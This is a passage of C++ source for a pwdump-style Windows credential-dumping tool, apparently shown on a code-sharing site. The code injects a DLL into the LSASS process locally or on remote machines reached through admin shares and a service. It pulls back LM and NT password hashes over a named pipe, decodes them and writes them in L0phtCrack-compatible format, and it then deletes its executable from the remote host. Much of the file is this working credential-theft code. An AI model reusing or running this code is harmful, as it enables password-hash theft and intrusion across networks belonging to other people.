📄 dumpmain.cpp
字号:
ConnParams param;
param.ip = target;
param.pipe = varg[0];
param.func = ProcessDumpOut;
HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, ¶m, 0, NULL);
if( hThread == INVALID_HANDLE )
{
fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
throw "";
}
fprintf( stderr, "connect to %s for result, plz wait...\n", param.ip );
// when the executable is finished running, it can be deleted - clean up
for( int i = 0; i < 30; i++ )
{
Sleep( 100 );
if( DeleteFile( rExename ) )
{
bDelExe = false;
break;
}
}
WaitForSingleObject( hThread, INFINITE );
throw " All Completed.\n";
}
// clean up
catch( char* msg )
{
if( msg && msg[0] ) fprintf( stderr, msg );
}
if( outfile ) fclose( outfile );
if( bDelExe && !DeleteFile(rExename) )
fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rExename, GetLastError() );
if( bDelDll && !DeleteFile(rDllname) )
fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rDllname, GetLastError() );
if( bDelSvc)
{
DeleteService( hsvc );
CloseServiceHandle( hsvc );
}
if( hscm ) CloseServiceHandle( hscm );
if( !bLocal) WNetCancelConnection2( resourceName, 0, false );
if( shareInfor ) NetApiBufferFree( shareInfor );
return 0;
}
int LocalDump( char *pipename )
{
HANDLE hLsassProc;
// create pipe for status info
ConnParams param;
param.ip = ".";
param.pipe = pipename;
param.func = ProcessDumpOut;
HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, ¶m, 0, NULL);
if( hThread == INVALID_HANDLE )
{
fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
return 0;
}
hLsassProc = PrepareInject( pipename, RUN_LOCALLY );
if( !hLsassProc ) return 0;
// Inject the dll
InjectDll( hLsassProc, magic );
CloseHandle( hLsassProc );
extern HANDLE hPipe;
EndBindPipe( hPipe );//we must end the server pipe, so the program can end.
WaitForSingleObject( hThread, INFINITE );
return 0;
}
void ProcessDumpOut( char *buff, int len )
{
// iterate though all values for this key - one per user on remote machine
buff[ len ] = 0;
try
{
if( 0 == memcmp( buff, SRV_OUTPUT_TAG, 4 ) || 0 == memcmp( buff, LSA_OUTPUT_TAG, 4 ) )
throw 1;
char *pHash = strchr( buff, ':' );
if( !pHash ) throw 1;
pHash = strchr( pHash+1, ':' );
if( !pHash ) throw 1;
*pHash = 0;
pHash ++;
char LMdata[40], NTdata[40], *p;
int i;
// obfuscation is reversible - this will make it plain text
obfuscate( (unsigned*)pHash, magic, 8 );
BYTE* bdata = (BYTE*)pHash;
// get LM hash
if( (pHash[4] == 0x35b4d3aa) && (pHash[5] == 0xee0414b5)
&& (pHash[6] == 0x35b4d3aa) && (pHash[7] == 0xee0414b5) )
sprintf( LMdata, "***********NO PASSWORD**********" );
else for( i = 16, p = LMdata; i < 32; i++, p += 2 )
sprintf( p, "%02X", bdata[i] );
// get NT hash
if( (pHash[0] == 0xe0cfd631) && (pHash[1] == 0x31e96ad1)
&& (pHash[2] == 0xd7593cb7) && (pHash[3] == 0xc089c0e0) )
sprintf( NTdata, "***********NO PASSWORD**********" );
else for( i = 0, p = NTdata; i < 16; i++, p += 2 )
sprintf( p, "%02X", bdata[i] );
// display data in L0phtCrack-compatible format
fprintf( outfile, "%s:%s:%s:::\n", buff, LMdata, NTdata );
}
catch( int dump )
{
if(dump)fprintf( stderr, "%s", buff );
}
}
/* fnExist [in] : the full path or of file to copy.
pathNew [in] : the path name only without filename to copy file to.
newFileName [out] : the buff to store the full path name of new file, at least MAX_PATH long.
bool CopyFileTo( char *fnExist, char *pathNew, char newFileName[] )
{
char localPath[MAX_PATH];
GetFullPathName( fnExist, sizeof(localPath), localPath, &fnExist );
_snprintf( newFileName, MAX_PATH, "%s\\%s", pathNew, fnExist );
return CopyFile( localPath, newFileName, false );
}
*/
char *locales[] = {
"chinese",
"cht",
"chs",
"danish",
"czech",
"belgian",
"dutch",
"australian",
"canadian",
"english",
"english-nz",
"uk",
"american",
"finnish",
"french-belgian",
"french-canadian",
"french",
"french-swiss",
"german-austrian",
"german",
"swiss",
"greek",
"hun",
"icelandic",
"italian",
"italian-swiss",
"jpn",
"korean",
"norwegian-bokmal",
"norwegian",
"norwegian-nynorsk",
"polish",
"portuguese-brazilian",
"portuguese",
"rus",
"slovak",
"spanish",
"spanish-mexican",
"spanish-modern",
"swedish",
"turkish",
NULL
};
/*
when some non-ansi char in unicode string(chinese, korea...), the convert function like
wcstombs & WideCharToMultiByte will fail. if only the locale set properly,
the convertion will be well, but the locale of remote is unknown, so i can
just try all locale one-by-one for each failure unicode char.
I cannot test Unicode2Ansi() & Ansi2Unicode() for more, i just have chinese windows.
*/
int Unicode2Ansi( char *strDest, wchar_t *wcsSrc )
{
char *dest = strDest;
wchar_t *source = wcsSrc;
int temp, page = -1, oldpage = -1;
for( ; *source != 0; dest++, source++ )
{
if( *source < 255 )
*dest = (char)*source;
else
{
page = -1;
do{
temp = wctomb( dest, *source );
if( temp >= 0 )break;
page++;
setlocale( LC_ALL, locales[page] );
}while( locales[page + 1] );
if( temp < 0 ) break;//a unicode char cannot convert
dest++;
if( page != -1 && page != oldpage ) oldpage = page;
}
}
*dest++ = 0;
if( oldpage != -1 ) printf( "Remote Code Page is: %s.\n", locales[oldpage] );
if( page > -1 && !locales[page] ) return -1;
return dest - strDest;
}
//set the code page to 0( a invalid one ), it can convert the chs & jpn, why?
int Ansi2Unicode( wchar_t *wcsDest, char *strSrc, int strCount )
{
return MultiByteToWideChar(0, MB_PRECOMPOSED | MB_ERR_INVALID_CHARS,
strSrc, -1, wcsDest, strCount * 2 );
/*
int codepages[] = {
37,
437,
500,
708,
709,
710,
720,
737,
775,
850,
852,
855,
857,
860,
861,
862,
863,
864,
865,
866,
869,
874,
875,
932,
936,
949,
950,
1026,
1250,
1251,
1252,
1253,
1254,
1255,
1256,
1257,
1361,
10000,
10001,
10006,
10007,
10029,
10079,
10081,
0
};
int j;
for ( int i = 0; codepages[i]; i++ )
if( j = MultiByteToWideChar(codepages[i], MB_PRECOMPOSED | MB_ERR_INVALID_CHARS,
strSrc, -1, wcsDest, strCount * 2 ) )
printf("%d,%d ", codepages[i], j);
else if(87 != GetLastError())printf("%d:%u ", codepages[i], GetLastError() );
puts("");
return j;
*/
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -